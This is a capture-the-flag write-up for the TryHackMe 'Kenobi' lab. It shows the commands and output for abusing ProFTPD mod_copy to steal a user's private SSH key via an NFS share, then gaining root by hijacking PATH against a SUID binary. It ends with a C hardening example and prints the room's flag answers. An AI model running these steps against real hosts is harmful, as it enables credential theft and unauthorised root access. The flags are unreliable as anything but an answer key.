Date: 16, May, 2021
Author: Dhilip Sanjay S
Click Here to go to the TryHackMe room.
- Answer: 7
- Steps to Reproduce:
$ nmap -sC -sV 10.10.108.221 -oN nmap.out
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-16 22:10 IST
Nmap scan report for 10.10.108.221
Host is up (0.21s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
| 256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_ 256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 47423/tcp mountd
| 100005 1,2,3 50885/udp6 mountd
| 100005 1,2,3 58983/tcp6 mountd
| 100005 1,2,3 60290/udp mountd
| 100021 1,3,4 34811/tcp6 nlockmgr
| 100021 1,3,4 45227/tcp nlockmgr
| 100021 1,3,4 52659/udp nlockmgr
| 100021 1,3,4 60533/udp6 nlockmgr
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: kenobi
| NetBIOS computer name: KENOBI\x00
| Domain name: \x00
| FQDN: kenobi
|_ System time: 2021-05-16T11:41:09-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-16T16:41:09
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.55 seconds
- Samba is the standard Windows interoperability suite of programs for Linux and Unix. It allows end users to access and use files, printers and other commonly shared resources on a company's intranet or the internet. It's often referred to as a network file system.
- SMB has two ports, 445 and 139.
- Answer: 3
- Steps to Reproduce:
$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.108.221 -oN nmap-smb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-16 22:16 IST
Nmap scan report for 10.10.108.221
Host is up (0.17s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.108.221\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 2
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.108.221\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.108.221\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
Nmap done: 1 IP address (1 host up) scanned in 25.05 seconds
- Answer: log.txt
- Steps to Reproduce:
- Connect to the `anonymous` SMB share with a blank password:
$ smbclient //10.10.108.221/anonymous
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 4 16:19:09 2019
.. D 0 Wed Sep 4 16:26:07 2019
log.txt N 12237 Wed Sep 4 16:19:09 2019
9204224 blocks of size 1024. 6877104 blocks available
$ smbget -R smb://10.10.108.221/anonymous
Password for [root] connecting to //anonymous/10.10.108.221:
Using workgroup WORKGROUP, user root
smb://10.10.108.221/anonymous/log.txt
Downloaded 11.95kB in 5 seconds
- Answer: 21
- Answer: /var
- Steps to Reproduce:
- The Nmap port scan will have shown port 111 running the service rpcbind. This is just a server that converts remote procedure call (RPC) program numbers into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number it's prepared to serve.
- In our case, port 111 gives access to a network file system. Let's use nmap to enumerate this.
$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.108.221
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-16 22:28 IST
Nmap scan report for 10.10.108.221
Host is up (0.17s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-ls: Volume /var
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 .
| rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 ..
| rwxr-xr-x 0 0 4096 2019-09-04T12:09:49 backups
| rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache
| rwxrwxrwt 0 0 4096 2019-09-04T08:43:56 crash
| rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local
| rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock
| rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log
| rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www
|_
| nfs-showmount:
|_ /var *
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ /var 9204224.0 1836536.0 6877092.0 22% 16.0T 32000
Nmap done: 1 IP address (1 host up) scanned in 3.02 seconds
- Answer: 1.3.5
- Steps to Reproduce: Check out the nmap results or connect using `nc <MACHINE_IP> 21`.
$ nc 10.10.108.221 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.108.221]
- Answer: 3
- Steps to Reproduce:
- By using searchsploit, we can find the exploits:
$ searchsploit ProFTPd 1.3.5
------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------ ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
- SITE CPFR - This SITE command specifies the source file/directory to use for copying from one place to another directly on the server.
- SITE CPTO - This SITE command specifies the destination file/directory to use for copying from one place to another directly on the server.
$ nc 10.10.108.221 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.108.221]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
$ mkdir /mnt/kenobiNFS
$ mount 10.10.108.221:/var /mnt/kenobiNFS
$ ls -la /mnt/kenobiNFS
total 56
drwxr-xr-x 14 root root 4096 Sep 4 2019 .
drwxr-xr-x 3 root root 4096 May 16 22:54 ..
drwxr-xr-x 2 root root 4096 Sep 4 2019 backups
drwxr-xr-x 9 root root 4096 Sep 4 2019 cache
drwxrwxrwt 2 root root 4096 Sep 4 2019 crash
drwxr-xr-x 40 root root 4096 Sep 4 2019 lib
drwxrwsr-x 2 root staff 4096 Apr 13 2016 local
lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock
drwxrwxr-x 10 root crontab 4096 Sep 4 2019 log
drwxrwsr-x 2 root mail 4096 Feb 27 2019 mail
drwxr-xr-x 2 root root 4096 Feb 27 2019 opt
lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run
drwxr-xr-x 2 root root 4096 Jan 30 2019 snap
drwxr-xr-x 5 root root 4096 Sep 4 2019 spool
drwxrwxrwt 6 root root 4096 May 16 22:49 tmp
drwxr-xr-x 3 root root 4096 Sep 4 2019 www
$ ls -la /mnt/kenobiNFS/tmp
total 28
drwxrwxrwt 6 root root 4096 May 16 22:49 .
drwxr-xr-x 14 root root 4096 Sep 4 2019 ..
-rw-r--r-- 1 ds ds 1675 May 16 22:49 id_rsa
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-2408059707bc41329243d2fc9e613f1e-systemd-timesyncd.service-a5PktM
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-6f4acd341c0b40569c92cee906c3edc9-systemd-timesyncd.service-z5o4Aw
drwx------ 3 root root 4096 May 16 22:08 systemd-private-d12feb6c5fe5457680089dceb1e3ae69-systemd-timesyncd.service-15xzHQ
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-e69bbb0653ce4ee3bd9ae0d93d2a5806-systemd-timesyncd.service-zObUdn
- Copy the private SSH key in `/var/tmp` to the local machine and then unmount the file system.
$ cp /mnt/kenobiNFS/tmp/id_rsa .
$ umount /mnt/kenobiNFS
- Answer: d0b0f3f53b6caa532a83915e19224899
- Steps to Reproduce:
$ chmod 600 id_rsa
$ ssh -i id_rsa kenobi@10.10.108.221
The authenticity of host '10.10.108.221 (10.10.108.221)' can't be established.
ECDSA key fingerprint is SHA256:uUzATQRA9mwUNjGY6h0B/wjpaZXJasCPBY30BvtMsPI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.108.221' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
103 packages can be updated.
65 updates are security updates.
Last login: Wed Sep 4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
kenobi@kenobi:~$ ls
share user.txt
kenobi@kenobi:~$ cat user.txt
d0b0f3f53b6caa532a83915e19224899
- SUID bits can be dangerous. Some binaries such as passwd need to run with elevated privileges (as it's resetting your password on the system); however, other custom files that have the SUID bit set can lead to all sorts of issues.
kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6
- Answer: /usr/bin/menu
- Usually in such vulnerable machines, we can find binaries like `/usr/bin/sudo` and `/usr/bin/su` having the SUID bit set! But we can't exploit this because we don't have kenobi's password.
- So, `/usr/bin/menu` seemed to be out of the ordinary.
- Answer: 3
- Steps to Reproduce:
$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
- On running the various options of `/usr/bin/menu`, we find that three binaries are being run as root:
- /usr/bin/curl (curl -I localhost)
- /usr/bin/uname (uname -r)
- /sbin/ifconfig (ifconfig)
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
HTTP/1.1 200 OK
Date: Sun, 16 May 2021 17:33:24 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
ETag: "c8-591b6884b6ed2"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Content-Type: text/html
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :2
4.8.0-58-generic
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3
eth0 Link encap:Ethernet HWaddr 02:f5:a8:1e:1a:65
inet addr:10.10.108.221 Bcast:10.10.255.255 Mask:255.255.0.0
inet6 addr: fe80::f5:a8ff:fe1e:1a65/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:9001 Metric:1
RX packets:82827 errors:0 dropped:0 overruns:0 frame:0
TX packets:79967 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3791786 (3.7 MB) TX bytes:4548369 (4.5 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:214 errors:0 dropped:0 overruns:0 frame:0
TX packets:214 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:16037 (16.0 KB) TX bytes:16037 (16.0 KB)
- Create a file called `curl` in the tmp directory that runs `/bin/sh`: `echo /bin/sh > curl`
- Change the permission to 777: `chmod 777 curl`.
- Modify the PATH variable so the `/tmp` directory is checked first.
kenobi@kenobi:~$ cd /tmp/
kenobi@kenobi:/tmp$ echo $PATH
/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
kenobi@kenobi:/tmp$ echo /bin/sh > curl
kenobi@kenobi:/tmp$ chmod 777 curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ echo $PATH
/tmp:/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
- Execute the
/usr/bin/menu
binary and choose the option 1.
kenobi@kenobi:/tmp$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
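The menu binary is hijackable because, while running as root, it invokes `curl`, `uname` and `ifconfig` by bare name and lets the caller's PATH decide which file that name resolves to. As an added example that is not the room's `/usr/bin/menu`, this is how such a helper can be written so the caller's environment no longer matters: absolute paths, a fixed environment handed to `execve`, and no shell in between. The `MENU` table and the `SAFE_ENV` value are assumptions for the example.

```c
/* Added example (not the Kenobi room's /usr/bin/menu): a SUID helper that
 * offers fixed commands must not let the caller's PATH decide what runs. */
#include <stdio.h>
#include <unistd.h>
#include <sys/wait.h>

/* Fixed environment given to every child; the caller's PATH is discarded.
 * The value is an assumption for this example. */
static char *const SAFE_ENV[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };

struct menu_entry {
    const char *label;
    const char *path;      /* absolute path: never resolved through PATH */
    char *const argv[4];   /* argv[0] is only a name shown to the child */
};

/* Assumed menu table mirroring the three options the room's binary offers. */
static const struct menu_entry MENU[] = {
    { "status check",   "/usr/bin/curl",  { "curl", "-I", "localhost", NULL } },
    { "kernel version", "/usr/bin/uname", { "uname", "-r", NULL, NULL } },
    { "ifconfig",       "/sbin/ifconfig", { "ifconfig", NULL, NULL, NULL } },
};

int path_is_absolute(const char *p) { return p != NULL && p[0] == '/'; }

/* 1 when every entry uses an absolute path, i.e. nothing is left to PATH. */
int menu_is_hardened(void)
{
    for (size_t i = 0; i < sizeof MENU / sizeof MENU[0]; i++)
        if (!path_is_absolute(MENU[i].path)) return 0;
    return 1;
}

/* Run one entry with execve and the fixed environment, no shell involved.
 * Returns the child's exit status, 127 if exec failed, -1 on fork/wait error. */
int run_entry(const struct menu_entry *e)
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(e->path, e->argv, SAFE_ENV);
        _exit(127);   /* only reached when the absolute path could not be run */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

A menu loop would read the choice and call `run_entry(&MENU[choice - 1])`; with the path fixed and the environment replaced, a `curl` file in `/tmp` is never consulted.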
- Answer: 177b3cd8562289f37382721c28381f02
- Steps to Reproduce:
# cd /root
# ls
root.txt
# cat root.txt
177b3cd8562289f37382721c28381f02